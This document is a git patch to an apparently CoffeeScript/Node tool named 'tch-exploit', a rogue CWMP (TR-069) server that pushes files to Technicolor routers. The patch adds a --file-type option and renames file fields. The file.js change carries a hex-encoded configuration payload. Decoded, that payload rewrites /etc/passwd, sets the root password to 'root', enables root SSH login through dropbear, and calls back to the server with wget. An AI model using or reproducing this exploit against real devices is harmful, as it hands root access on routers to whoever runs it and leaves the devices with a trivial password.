From 8232ac27a36c193577bc7a22695394b190c14c85 Mon Sep 17 00:00:00 2001
From: Nathan Bolam <bolamnathan@gmail.com>
Date: Thu, 16 Jan 2020 00:39:30 +1030
Subject: [PATCH] add --file-type to select cwmp type
---
dist/args.js | 10 +++++++++-
dist/http/cwmp/index.js | 23 ++++++++++++++++-----
dist/http/cwmp/xml.js | 8 ++++++++
dist/http/file.js | 3 ++-
dist/http/index.js | 41 ++++++++++++--------------------------
package.json | 2 +-
src/args.coffee | 5 ++++-
src/http/cwmp/index.coffee | 12 +++++++----
src/http/cwmp/xml.coffee | 7 +++++++
9 files changed, 70 insertions(+), 41 deletions(-)
diff --git a/dist/args.js b/dist/args.js
index 73e60db..39d9612 100644
--- a/dist/args.js
+++ b/dist/args.js
@@ -1,8 +1,16 @@
+var snakeToCamel;
+
+snakeToCamel = function(s) {
+ return s.replace(/(\-\w)/g, function(m) {
+ return m[1].toUpperCase();
+ });
+};
+
module.exports = process.argv.slice(2, process.argv.length).reduce(function(args, str) {
var arg, flag, value;
arg = str.split('=');
flag = arg[0].slice(2, arg[0].length);
value = arg[1] || true;
- args[flag] = value;
+ args[snakeToCamel(flag)] = value;
return args;
}, {});
diff --git a/dist/http/cwmp/index.js b/dist/http/cwmp/index.js
index 0659f35..b9d1fe0 100644
--- a/dist/http/cwmp/index.js
+++ b/dist/http/cwmp/index.js
@@ -1,10 +1,12 @@
'use strict';
-var createSoapEnv, device, env, file, finished, methods, parse, ref, request, response, set, stage;
+var args, createSoapEnv, device, env, file, fileTypes, finished, methods, parse, ref, request, response, set, stage;
-ref = require('./xml'), parse = ref.parse, methods = ref.methods, createSoapEnv = ref.createSoapEnv;
+ref = require('./xml'), parse = ref.parse, methods = ref.methods, createSoapEnv = ref.createSoapEnv, fileTypes = ref.fileTypes;
file = require('../file');
+args = require('../../args');
+
stage = null;
device = {};
@@ -75,9 +77,20 @@ request = function(url, req, res) {
console.log('>>> EMPTY REQUEST');
console.dir([req.headers, req.body]);
res.name = 'cwmp:Download';
- res.fileType = '3 Vendor Configuration File';
- res.fileSize = file.sts.length;
- res.url = url + "file.sts";
+ if (args.fileType && (fileTypes[args.fileType] != null)) {
+ res.fileType = fileTypes[args.fileType];
+ } else {
+ res.fileType = (function() {
+ switch (file.ext) {
+ case '.rbi':
+ return '1 Firmware Upgrade Image';
+ case '.sts':
+ return '3 Vendor Configuration File';
+ }
+ })();
+ }
+ res.fileSize = file.data.length;
+ res.url = "" + url + file.name;
}
res.env = env.join(' ');
return response(res);
diff --git a/dist/http/cwmp/xml.js b/dist/http/cwmp/xml.js
index 5b9bd0a..3543a07 100644
--- a/dist/http/cwmp/xml.js
+++ b/dist/http/cwmp/xml.js
@@ -125,3 +125,11 @@ exports.methods = methods = {
exports.createSoapEnv = function(res, headers) {
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<soap-env:Envelope " + (res.env || '') + ">\n <soap-env:Header>\n <cwmp:ID soap-env:mustUnderstand=\"1\">" + res.id + "</cwmp:ID>\n </soap-env:Header>\n <soap-env:Body>\n " + (methods[res.name](res, headers)) + "\n </soap-env:Body>\n</soap-env:Envelope>";
};
+
+exports.fileTypes = {
+ 1: '1 Firmware Upgrade Image',
+ 2: '2 Web Content',
+ 3: '3 Vendor Configuration File',
+ 4: '4 Tone File',
+ 5: '5 Ringer File'
+};
diff --git a/dist/http/file.js b/dist/http/file.js
index d9a7192..367e594 100644
--- a/dist/http/file.js
+++ b/dist/http/file.js
@@ -1,3 +1,4 @@
module.exports = {
- sts: Buffer.from('7265626f6f74206f66660a73657420627574746f6e2e7770732e68616e646c65723d22736564202d69202773232f726f6f743a2e2a24232f726f6f743a2f62696e2f6173682327202f6574632f706173737764202626206563686f20726f6f743a726f6f74207c20636870617373776420262620736564202d692e736176652027732f232f2f27202f6574632f696e697474616220262620756369206164642064726f70626561722064726f7062656172202626207563692072656e616d652064726f70626561722e4064726f70626561725b2d315d3d61666720262620756369207365742064726f70626561722e6166672e656e61626c653d27312720262620756369207365742064726f70626561722e6166672e496e746572666163653d276c616e2720262620756369207365742064726f70626561722e6166672e506f72743d2732322720262620756369207365742064726f70626561722e6166672e49646c6554696d656f75743d273630302720262620756369207365742064726f70626561722e6166672e50617373776f7264417574683d276f6e2720262620756369207365742064726f70626561722e6166672e526f6f7450617373776f7264417574683d276f6e2720262620756369207365742064726f70626561722e6166672e526f6f744c6f67696e3d2731272026262075636920636f6d6d69742064726f7062656172202626202f6574632f696e69742e642f64726f706265617220656e61626c65202626202f6574632f696e69742e642f64726f70626561722072657374617274202626207563692073657420627574746f6e2e7770732e68616e646c65723d277770735f627574746f6e5f707265737365642e7368272026262075636920636f6d6d69742026262077676574207b7b75726c7d7d646f6e65207c7c207472756522', 'hex')
+ name: 'file.sts',
+ data: Buffer.from('7265626f6f74206f66660a73657420627574746f6e2e7770732e68616e646c65723d22736564202d69202773232f726f6f743a2e2a24232f726f6f743a2f62696e2f6173682327202f6574632f706173737764202626206563686f20726f6f743a726f6f74207c20636870617373776420262620736564202d692e736176652027732f232f2f27202f6574632f696e697474616220262620756369206164642064726f70626561722064726f7062656172202626207563692072656e616d652064726f70626561722e4064726f70626561725b2d315d3d61666720262620756369207365742064726f70626561722e6166672e656e61626c653d27312720262620756369207365742064726f70626561722e6166672e496e746572666163653d276c616e2720262620756369207365742064726f70626561722e6166672e506f72743d2732322720262620756369207365742064726f70626561722e6166672e49646c6554696d656f75743d273630302720262620756369207365742064726f70626561722e6166672e50617373776f7264417574683d276f6e2720262620756369207365742064726f70626561722e6166672e526f6f7450617373776f7264417574683d276f6e2720262620756369207365742064726f70626561722e6166672e526f6f744c6f67696e3d2731272026262075636920636f6d6d69742064726f7062656172202626202f6574632f696e69742e642f64726f706265617220656e61626c65202626202f6574632f696e69742e642f64726f70626561722072657374617274202626207563692073657420627574746f6e2e7770732e68616e646c65723d277770735f627574746f6e5f707265737365642e7368272026262075636920636f6d6d69742026262077676574207b7b75726c7d7d646f6e65207c7c207472756522', 'hex')
};
diff --git a/dist/http/index.js b/dist/http/index.js
index ee7b1eb..e2c7be7 100644
--- a/dist/http/index.js
+++ b/dist/http/index.js
@@ -18,27 +18,30 @@ cwmp = require('./cwmp');
module.exports = function(ip, port, url) {
var e, srv;
- if (args.sts) {
+ if (args.file) {
+ file.name = path.basename(args.file);
try {
- file.sts = readFileSync(args.sts);
+ file.data = readFileSync(args.file);
} catch (error) {
e = error;
throw e;
}
}
- file.sts = Buffer.from(file.sts).toString('utf8').replace('{{url}}', url, 'utf8');
- route.get('/file.sts', function(req, res) {
- var headers, stream;
- console.log('>>> STS REQUEST');
+ file.data = Buffer.from(file.data).toString('utf8').replace('{{url}}', url, 'utf8');
+ file.ext = path.extname(file.name);
+ route.get("/" + file.name, function(req, res) {
+ var ext, headers, stream;
+ ext = file.ext.toUpperCase();
+ console.log(">>> " + ext + " REQUEST");
headers = {
'Content-Type': 'text/plain',
- 'Content-Length': file.sts.length
+ 'Content-Length': file.data.length
};
- console.log('>>> STS RESPONSE');
- console.dir([headers, file.sts.toString('utf8')]);
+ console.log('>>> #{ ext } RESPONSE');
+ console.dir([headers, file.data.toString('utf8')]);
res.writeHead(200, headers);
stream = new Duplex();
- stream.push(file.sts);
+ stream.push(file.data);
stream.push(null);
return stream.pipe(res);
}).get('/done', function(req, res) {
@@ -49,24 +52,6 @@ module.exports = function(ip, port, url) {
}, 20000);
res.writeHead(200);
return res.end();
- }).get('/{rbi}(.*?).rbi', function(req, res) {
- var fp, headers, stats, stream;
- console.log('>>> RBI REQUEST');
- fp = path.join(process.cwd(), req.params.rbi, '.rbi');
- if (existsSync(fp)) {
- stats = statSync(fp);
- headers = {
- 'Content-Type': 'text/plain',
- 'Content-Length': stats.size
- };
- stream = createReadStream(fp);
- console.log('>>> RBI RESPONSE');
- console.dir([headers, fp]);
- res.writeHead(200, headers);
- return stream.pipe(res);
- } else {
- return res.writeHead(404);
- }
}).post('/', cwmp(url));
srv = createServer(route);
srv.keepAliveTimeout = 30000;
diff --git a/package.json b/package.json
index 4fa0f92..0e93ad5 100644
--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
{
"name": "tch-exploit",
- "version": "2.0.1-rc6",
+ "version": "2.0.1-rc7",
"main": "dist/index.js",
"bin": "dist/index.js",
"scripts": {
diff --git a/src/args.coffee b/src/args.coffee
index 232733b..bc28571 100644
--- a/src/args.coffee
+++ b/src/args.coffee
@@ -1,3 +1,6 @@
+snakeToCamel = (s) ->
+ s.replace /(\-\w)/g, (m) ->
+ m[1].toUpperCase()
module.exports = process.argv
.slice 2, process.argv.length
@@ -6,6 +9,6 @@ module.exports = process.argv
flag = arg[0].slice 2, arg[0].length
value = arg[1] or true
- args[flag] = value
+ args[snakeToCamel(flag)] = value
args
, {}
diff --git a/src/http/cwmp/index.coffee b/src/http/cwmp/index.coffee
index 8dd4107..e9248a3 100644
--- a/src/http/cwmp/index.coffee
+++ b/src/http/cwmp/index.coffee
@@ -1,8 +1,9 @@
'use strict'
-{ parse, methods, createSoapEnv } = require './xml'
+{ parse, methods, createSoapEnv, fileTypes } = require './xml'
file = require '../file'
+args = require '../../args'
stage = null
device = {}
@@ -70,9 +71,12 @@ request = (url, req, res) ->
res.name = 'cwmp:Download'
- res.fileType = switch file.ext
- when '.rbi' then '1 Firmware Upgrade Image'
- when '.sts' then '3 Vendor Configuration File'
+ if args.fileType and fileTypes[args.fileType]?
+ res.fileType = fileTypes[args.fileType]
+ else
+ res.fileType = switch file.ext
+ when '.rbi' then '1 Firmware Upgrade Image'
+ when '.sts' then '3 Vendor Configuration File'
res.fileSize = file.data.length
res.url = "#{ url }#{file.name}"
diff --git a/src/http/cwmp/xml.coffee b/src/http/cwmp/xml.coffee
index 893cda5..0c5816e 100644
--- a/src/http/cwmp/xml.coffee
+++ b/src/http/cwmp/xml.coffee
@@ -133,3 +133,10 @@ exports.createSoapEnv = (res, headers) ->
#{ methods[res.name] res, headers }
</soap-env:Body>
</soap-env:Envelope>"""
+
+exports.fileTypes =
+ 1: '1 Firmware Upgrade Image'
+ 2: '2 Web Content'
+ 3: '3 Vendor Configuration File'
+ 4: '4 Tone File'
+ 5: '5 Ringer File'